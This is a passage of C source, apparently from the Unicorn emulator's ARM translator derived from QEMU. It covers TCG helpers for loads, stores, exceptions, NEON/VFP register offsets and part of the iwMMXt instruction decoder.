gen_aa32_frob64(s, val); tcg_temp_free(tcg_ctx, addr); } static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index) { gen_aa32_ld_i64(s, val, a32, index, MO_Q | s->be_data); } static void gen_aa32_st_i64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = gen_aa32_addr(s, a32, opc); /* Not needed for user-mode BE32, where we use MO_BE instead. */ // Unicorn: By default UC_MODE_BIG_MODE is BE32 mode, which in fact qemu-usermode. // Thus, we only do this in BE8 (qemu system) mode. if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_rotri_i64(tcg_ctx, tmp, val, 32); tcg_gen_qemu_st_i64(tcg_ctx, tmp, addr, index, opc); tcg_temp_free_i64(tcg_ctx, tmp); } else { tcg_gen_qemu_st_i64(tcg_ctx, val, addr, index, opc); } tcg_temp_free(tcg_ctx, addr); } static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index) { gen_aa32_st_i64(s, val, a32, index, MO_Q | s->be_data); } DO_GEN_LD(8u, MO_UB) DO_GEN_LD(16u, MO_UW) DO_GEN_LD(32u, MO_UL) DO_GEN_ST(8, MO_UB) DO_GEN_ST(16, MO_UW) DO_GEN_ST(32, MO_UL) static inline void gen_hvc(DisasContext *s, int imm16) { /* The pre HVC helper handles cases when HVC gets trapped * as an undefined insn by runtime configuration (ie before * the insn really executes). */ TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_pc_im(s, s->pc_curr); gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); /* Otherwise we will treat this as a real exception which * happens after execution of the insn. (The distinction matters * for the PC value reported to the exception handler and also * for single stepping.) */ s->svc_imm = imm16; gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_HVC; } static inline void gen_smc(DisasContext *s) { /* As with HVC, we may take an exception either before or after * the insn executes. */ TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; gen_set_pc_im(s, s->pc_curr); tmp = tcg_const_i32(tcg_ctx, syn_aa32_smc()); gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_SMC; } static void gen_exception_internal_insn(DisasContext *s, uint32_t pc, int excp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_condexec(s); gen_set_pc_im(s, pc); gen_exception_internal(tcg_ctx, excp); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_insn(DisasContext *s, uint32_t pc, int excp, int syn, uint32_t target_el) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_condexec(s); gen_set_pc_im(s, pc); gen_exception(tcg_ctx, excp, syn, target_el); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_bkpt_insn(DisasContext *s, uint32_t syn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_syn; gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_syn = tcg_const_i32(tcg_ctx, syn); gen_helper_exception_bkpt_insn(tcg_ctx, tcg_ctx->cpu_env, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_syn); s->base.is_jmp = DISAS_NORETURN; } static void unallocated_encoding(DisasContext *s) { /* Unallocated and reserved encodings are uncategorized */ gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), default_exception_el(s)); } /* Force a TB lookup after an instruction that changes the CPU state. */ static inline void gen_lookup_tb(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], s->base.pc_next); s->base.is_jmp = DISAS_EXIT; } static inline void gen_hlt(DisasContext *s, int imm) { /* HLT. This has two purposes. * Architecturally, it is an external halting debug instruction. * Since QEMU doesn't implement external debug, we treat this as * it is required for halting debug disabled: it will UNDEF. * Secondly, "HLT 0x3C" is a T32 semihosting trap instruction, * and "HLT 0xF000" is an A32 semihosting syscall. These traps * must trigger semihosting even for ARMv7 and earlier, where * HLT was an undefined encoding. * In system mode, we don't allow userspace access to * semihosting, to provide some semblance of security * (and for consistency with our 32-bit semihosting). */ unallocated_encoding(s); } static TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, int neon) { TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); int offset; if (neon) { offset = offsetof(CPUARMState, vfp.standard_fp_status); } else { offset = offsetof(CPUARMState, vfp.fp_status); } tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); return statusptr; } static inline long vfp_reg_offset(bool dp, unsigned reg) { if (dp) { return offsetof(CPUARMState, vfp.zregs[reg >> 1].d[reg & 1]); } else { long ofs = offsetof(CPUARMState, vfp.zregs[reg >> 2].d[(reg >> 1) & 1]); if (reg & 1) { ofs += offsetof(CPU_DoubleU, l.upper); } else { ofs += offsetof(CPU_DoubleU, l.lower); } return ofs; } } /* Return the offset of a 32-bit piece of a NEON register. zero is the least significant end of the register. */ static inline long neon_reg_offset (int reg, int n) { int sreg; sreg = reg * 2 + n; return vfp_reg_offset(0, sreg); } /* Return the offset of a 2**SIZE piece of a NEON register, at index ELE, * where 0 is the least significant end of the register. */ static inline long neon_element_offset(int reg, int element, MemOp size) { int element_size = 1 << size; int ofs = element * element_size; #ifdef HOST_WORDS_BIGENDIAN /* Calculate the offset assuming fully little-endian, * then XOR to account for the order of the 8-byte units. */ if (element_size < 8) { ofs ^= 8 - element_size; } #endif return neon_reg_offset(reg, 0) + ofs; } static TCGv_i32 neon_load_reg(TCGContext *tcg_ctx, int reg, int pass) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); return tmp; } static void neon_load_element(TCGContext *tcg_ctx, TCGv_i32 var, int reg, int ele, MemOp mop) { long offset = neon_element_offset(reg, ele, mop & MO_SIZE); switch (mop) { case MO_UB: tcg_gen_ld8u_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UW: tcg_gen_ld16u_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UL: tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_load_element64(TCGContext *tcg_ctx, TCGv_i64 var, int reg, int ele, MemOp mop) { long offset = neon_element_offset(reg, ele, mop & MO_SIZE); switch (mop) { case MO_UB: tcg_gen_ld8u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UW: tcg_gen_ld16u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_UL: tcg_gen_ld32u_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_Q: tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_store_reg(TCGContext *tcg_ctx, int reg, int pass, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); tcg_temp_free_i32(tcg_ctx, var); } static void neon_store_element(TCGContext *tcg_ctx, int reg, int ele, MemOp size, TCGv_i32 var) { long offset = neon_element_offset(reg, ele, size); switch (size) { case MO_8: tcg_gen_st8_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_16: tcg_gen_st16_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_32: tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static void neon_store_element64(TCGContext *tcg_ctx, int reg, int ele, MemOp size, TCGv_i64 var) { long offset = neon_element_offset(reg, ele, size); switch (size) { case MO_8: tcg_gen_st8_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_16: tcg_gen_st16_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_32: tcg_gen_st32_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; case MO_64: tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offset); break; default: g_assert_not_reached(); break; } } static inline void neon_load_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); } static inline void neon_store_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); } static inline void neon_load_reg32(TCGContext *tcg_ctx, TCGv_i32 var, int reg) { tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(false, reg)); } static inline void neon_store_reg32(TCGContext *tcg_ctx, TCGv_i32 var, int reg) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(false, reg)); } static TCGv_ptr vfp_reg_ptr(TCGContext *tcg_ctx, bool dp, int reg) { TCGv_ptr ret = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ret, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); return ret; } #define ARM_CP_RW_BIT (1 << 20) /* Include the VFP decoder */ #include "translate-vfp.inc.c" static inline void iwmmxt_load_reg(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); } static inline void iwmmxt_store_reg(TCGContext *tcg_ctx, TCGv_i64 var, int reg) { tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); } static inline TCGv_i32 iwmmxt_load_creg(TCGContext *tcg_ctx, int reg) { TCGv_i32 var = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); return var; } static inline void iwmmxt_store_creg(TCGContext *tcg_ctx, int reg, TCGv_i32 var) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); tcg_temp_free_i32(tcg_ctx, var); } static inline void gen_op_iwmmxt_movq_wRn_M0(TCGContext *tcg_ctx, int rn) { iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_M0, rn); } static inline void gen_op_iwmmxt_movq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_M0, rn); } static inline void gen_op_iwmmxt_orq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline void gen_op_iwmmxt_andq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_and_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline void gen_op_iwmmxt_xorq_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } #define IWMMXT_OP(name) \ static inline void gen_op_iwmmxt_##name##_M0_wRn(TCGContext *tcg_ctx, int rn) \ { \ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ } #define IWMMXT_OP_ENV(name) \ static inline void gen_op_iwmmxt_##name##_M0_wRn(TCGContext *tcg_ctx, int rn) \ { \ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ } #define IWMMXT_OP_ENV_SIZE(name) \ IWMMXT_OP_ENV(name##b) \ IWMMXT_OP_ENV(name##w) \ IWMMXT_OP_ENV(name##l) #define IWMMXT_OP_ENV1(name) \ static inline void gen_op_iwmmxt_##name##_M0(TCGContext *tcg_ctx) \ { \ gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0); \ } IWMMXT_OP(maddsq) IWMMXT_OP(madduq) IWMMXT_OP(sadb) IWMMXT_OP(sadw) IWMMXT_OP(mulslw) IWMMXT_OP(mulshw) IWMMXT_OP(mululw) IWMMXT_OP(muluhw) IWMMXT_OP(macsw) IWMMXT_OP(macuw) IWMMXT_OP_ENV_SIZE(unpackl) IWMMXT_OP_ENV_SIZE(unpackh) IWMMXT_OP_ENV1(unpacklub) IWMMXT_OP_ENV1(unpackluw) IWMMXT_OP_ENV1(unpacklul) IWMMXT_OP_ENV1(unpackhub) IWMMXT_OP_ENV1(unpackhuw) IWMMXT_OP_ENV1(unpackhul) IWMMXT_OP_ENV1(unpacklsb) IWMMXT_OP_ENV1(unpacklsw) IWMMXT_OP_ENV1(unpacklsl) IWMMXT_OP_ENV1(unpackhsb) IWMMXT_OP_ENV1(unpackhsw) IWMMXT_OP_ENV1(unpackhsl) IWMMXT_OP_ENV_SIZE(cmpeq) IWMMXT_OP_ENV_SIZE(cmpgtu) IWMMXT_OP_ENV_SIZE(cmpgts) IWMMXT_OP_ENV_SIZE(mins) IWMMXT_OP_ENV_SIZE(minu) IWMMXT_OP_ENV_SIZE(maxs) IWMMXT_OP_ENV_SIZE(maxu) IWMMXT_OP_ENV_SIZE(subn) IWMMXT_OP_ENV_SIZE(addn) IWMMXT_OP_ENV_SIZE(subu) IWMMXT_OP_ENV_SIZE(addu) IWMMXT_OP_ENV_SIZE(subs) IWMMXT_OP_ENV_SIZE(adds) IWMMXT_OP_ENV(avgb0) IWMMXT_OP_ENV(avgb1) IWMMXT_OP_ENV(avgw0) IWMMXT_OP_ENV(avgw1) IWMMXT_OP_ENV(packuw) IWMMXT_OP_ENV(packul) IWMMXT_OP_ENV(packuq) IWMMXT_OP_ENV(packsw) IWMMXT_OP_ENV(packsl) IWMMXT_OP_ENV(packsq) static void gen_op_iwmmxt_set_mup(TCGContext *tcg_ctx) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, iwmmxt.cregs[ARM_IWMMXT_wCon]); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 2); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); } static void gen_op_iwmmxt_set_cup(TCGContext *tcg_ctx) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, iwmmxt.cregs[ARM_IWMMXT_wCon]); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 1); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); } static void gen_op_iwmmxt_setpsr_nz(TCGContext *tcg_ctx) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_iwmmxt_setpsr_nz(tcg_ctx, tmp, tcg_ctx->cpu_M0); store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCASF]); } static inline void gen_op_iwmmxt_addl_M0_wRn(TCGContext *tcg_ctx, int rn) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rn); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } static inline int gen_iwmmxt_address(DisasContext *s, uint32_t insn, TCGv_i32 dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd; uint32_t offset; TCGv_i32 tmp; rd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); offset = (insn & 0xff) << ((insn >> 7) & 2); if (insn & (1 << 24)) { /* Pre indexed */ if (insn & (1 << 23)) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); else #ifdef _MSC_VER tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0 - offset); #else tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -offset); #endif tcg_gen_mov_i32(tcg_ctx, dest, tmp); if (insn & (1 << 21)) store_reg(s, rd, tmp); else tcg_temp_free_i32(tcg_ctx, tmp); } else if (insn & (1 << 21)) { /* Post indexed */ tcg_gen_mov_i32(tcg_ctx, dest, tmp); if (insn & (1 << 23)) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); else #ifdef _MSC_VER tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0 - offset); #else tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -offset); #endif store_reg(s, rd, tmp); } else if (!(insn & (1 << 23))) return 1; return 0; } static inline int gen_iwmmxt_shift(TCGContext *tcg_ctx, uint32_t insn, uint32_t mask, TCGv_i32 dest) { int rd = (insn >> 0) & 0xf; TCGv_i32 tmp; if (insn & (1 << 8)) { if (rd < ARM_IWMMXT_wCGR0 || rd > ARM_IWMMXT_wCGR3) { return 1; } else { tmp = iwmmxt_load_creg(tcg_ctx, rd); } } else { tmp = tcg_temp_new_i32(tcg_ctx); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, rd); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); } tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask); tcg_gen_mov_i32(tcg_ctx, dest, tmp); tcg_temp_free_i32(tcg_ctx, tmp); return 0; } /* Disassemble an iwMMXt instruction. Returns nonzero if an error occurred (ie. an undefined instruction). */ static int disas_iwmmxt_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd, wrd; int rdhi, rdlo, rd0, rd1, i; TCGv_i32 addr; TCGv_i32 tmp, tmp2, tmp3; if ((insn & 0x0e000e00) == 0x0c000000) { if ((insn & 0x0fe00ff0) == 0x0c400000) { wrd = insn & 0xf; rdlo = (insn >> 12) & 0xf; rdhi = (insn >> 16) & 0xf; if (insn & ARM_CP_RW_BIT) { /* TMRRC */ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, wrd); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); } else { /* TMCRR */ tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_V0, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); } return 0; } wrd = (insn >> 12) & 0xf; addr = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_address(s, insn, addr)) { tcg_temp_free_i32(tcg_ctx, addr); return 1; } if (insn & ARM_CP_RW_BIT) { if ((insn >> 28) == 0xf) { /* WLDRW wCx */ tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); iwmmxt_store_creg(tcg_ctx, wrd, tmp); } else { i = 1; if (insn & (1 << 8)) { if (insn & (1 << 22)) { /* WLDRD */ gen_aa32_ld64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); i = 0; } else { /* WLDRW wRd */ tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); } } else { tmp = tcg_temp_new_i32(tcg_ctx); if (insn & (1 << 22)) { /* WLDRH */ gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); } else { /* WLDRB */ gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); } } if (i) { tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_M0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); } } else { if ((insn >> 28) == 0xf) { /* WSTRW wCx */ tmp = iwmmxt_load_creg(tcg_ctx, wrd); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } else { gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = tcg_temp_new_i32(tcg_ctx); if (insn & (1 << 8)) { if (insn & (1 << 22)) { /* WSTRD */ gen_aa32_st64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); } else { /* WSTRW wRd */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } } else { if (insn & (1 << 22)) { /* WSTRH */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st16(s, tmp, addr, get_mem_index(s)); } else { /* WSTRB */ tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); gen_aa32_st8(s, tmp, addr, get_mem_index(s)); } } } tcg_temp_free_i32(tcg_ctx, tmp); } tcg_temp_free_i32(tcg_ctx, addr); return 0; } if ((insn & 0x0f000000) != 0x0e000000) return 1; switch (((insn >> 12) & 0xf00) | ((insn >> 4) & 0xff)) { case 0x000: /* WOR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_orq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x011: /* TMCR */ if (insn & 0xf) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; switch (wrd) { case ARM_IWMMXT_wCID: case ARM_IWMMXT_wCASF: break; case ARM_IWMMXT_wCon: gen_op_iwmmxt_set_cup(tcg_ctx); /* Fall through. */ case ARM_IWMMXT_wCSSF: tmp = iwmmxt_load_creg(tcg_ctx, wrd); tmp2 = load_reg(s, rd); tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); iwmmxt_store_creg(tcg_ctx, wrd, tmp); break; case ARM_IWMMXT_wCGR0: case ARM_IWMMXT_wCGR1: case ARM_IWMMXT_wCGR2: case ARM_IWMMXT_wCGR3: gen_op_iwmmxt_set_cup(tcg_ctx); tmp = load_reg(s, rd); iwmmxt_store_creg(tcg_ctx, wrd, tmp); break; default: return 1; } break; case 0x100: /* WXOR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_xorq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x111: /* TMRC */ if (insn & 0xf) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = iwmmxt_load_creg(tcg_ctx, wrd); store_reg(s, rd, tmp); break; case 0x300: /* WANDN */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tcg_gen_neg_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); gen_op_iwmmxt_andq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x200: /* WAND */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); gen_op_iwmmxt_andq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_setpsr_nz(tcg_ctx); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x810: case 0xa10: /* WMADD */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 0) & 0xf; rd1 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) gen_op_iwmmxt_maddsq_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_madduq_M0_wRn(tcg_ctx, rd1); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x10e: case 0x50e: case 0x90e: case 0xd0e: /* WUNPCKIL */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_unpacklb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_unpacklw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_unpackll_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x10c: case 0x50c: case 0x90c: case 0xd0c: /* WUNPCKIH */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_unpackhb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_unpackhw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_unpackhl_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x012: case 0x112: case 0x412: case 0x512: /* WSAD */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 22)) gen_op_iwmmxt_sadw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_sadb_M0_wRn(tcg_ctx, rd1); if (!(insn & (1 << 20))) gen_op_iwmmxt_addl_M0_wRn(tcg_ctx, wrd); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x010: case 0x110: case 0x210: case 0x310: /* WMUL */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) { if (insn & (1 << 20)) gen_op_iwmmxt_mulshw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_mulslw_M0_wRn(tcg_ctx, rd1); } else { if (insn & (1 << 20)) gen_op_iwmmxt_muluhw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_mululw_M0_wRn(tcg_ctx, rd1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x410: case 0x510: case 0x610: case 0x710: /* WMAC */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 21)) gen_op_iwmmxt_macsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_macuw_M0_wRn(tcg_ctx, rd1); if (!(insn & (1 << 20))) { iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, wrd); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x006: case 0x406: case 0x806: case 0xc06: /* WCMPEQ */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_op_iwmmxt_cmpeqb_M0_wRn(tcg_ctx, rd1); break; case 1: gen_op_iwmmxt_cmpeqw_M0_wRn(tcg_ctx, rd1); break; case 2: gen_op_iwmmxt_cmpeql_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } 